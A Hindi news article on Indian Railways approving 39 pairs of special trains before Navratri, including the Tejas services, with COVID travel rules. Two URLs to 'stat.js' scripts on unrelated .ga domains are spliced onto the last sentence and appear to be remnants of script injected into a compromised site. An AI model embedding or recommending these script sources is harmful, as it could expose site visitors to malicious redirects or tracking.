रेलवे प्रशासन ने यात्रियों की मांग को मद्देनज़र् रखते हुए कई ट्रेनों को हरी झंडी दिखा चुका है और अब भारतीय रेलवे ने नवरात्री शुरू होने से पहले 78 यानी कि 39 जोड़ी स्पेशल ट्रेनों के परिचालन के लिए बुधवार को अनुमति दे दी है जो विभिन्न कोरोना जोनों में सुविधाजनक चलाई जाएंगी। आपको बता दें, इन ट्रेनों में ज्यादातर एसी स्पेशल, शताब्दी, राजधानी, और दूरंतो श्रेणी की होंगी। नवरात्र के पहले ही दिन कॉर्पोरेट सेक्टर की प्रमुख ट्रेन तेजस शुरू करी जायेगी।

 

खबरों के मुताबिक, इनमें पहली तेजस दिल्ली से लखनऊ और दूसरी अहमदाबाद से मुंबई के बीच चलेगी। तेजस ट्रेन में यात्रा करने वालों के लिए कोरोना से बचाव के विशेष बंदोबस्त किए गए हैं और यात्रियोन् को गाईडलाईन का सख़्ती से पालन करने के निर्देश दिए गए हैं। यात्रियों को आरोग्य सेतु एप के बगैर यात्रा की अनुमति नहीं होगी। रेलवे मंत्रालय ने एक बयान में बताया कि ये ट्रेनें स्पेशल ट्रेनों के रूप में चलाई जाएंगी। लेकिन अभी तक यह नहीं बताया गया है कि ये ट्रेनें कब चलेंगी। रेलवे का कहना है कि इन्हें जल्दी से जल्दी सुविधाजनक तारीख से शुरू किया जाएगा।

 

आइआरसीटीसी के मुताबिक, तेजस में यात्रा के लिए ट्रेन में एक सीट छोड़कर बैठना होगा। एक बार सीट पर बैठने के बाद किसी सीट के साथ अदला-बदली नहीं होगी। ट्रेन में प्रत्येक यात्री को मास्क, सैनिटाइजर और ग्लव्स आदि वस्तुएं प्रदान की जाएंगी। यात्रा के दौरान कोरोना प्रोटोकॉल का पूरी तरह पालन किया जाएगा।

 

रेलवे बोर्ड के चेयरमैन वीके यादव ने कहा था कि कोरोना महामारी के मद्देनजर राज्यों की सहमति से ही ट्रेनों की संख्या बढ़ाई जा सकेगी। लेकिन अब पूरी तरह अनलॉक होने के बाद ट्रेनों की संख्या में इजाफा हो सकता है। माता वैष्णो देवी के लिए भी ट्रेन चालू होगी।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.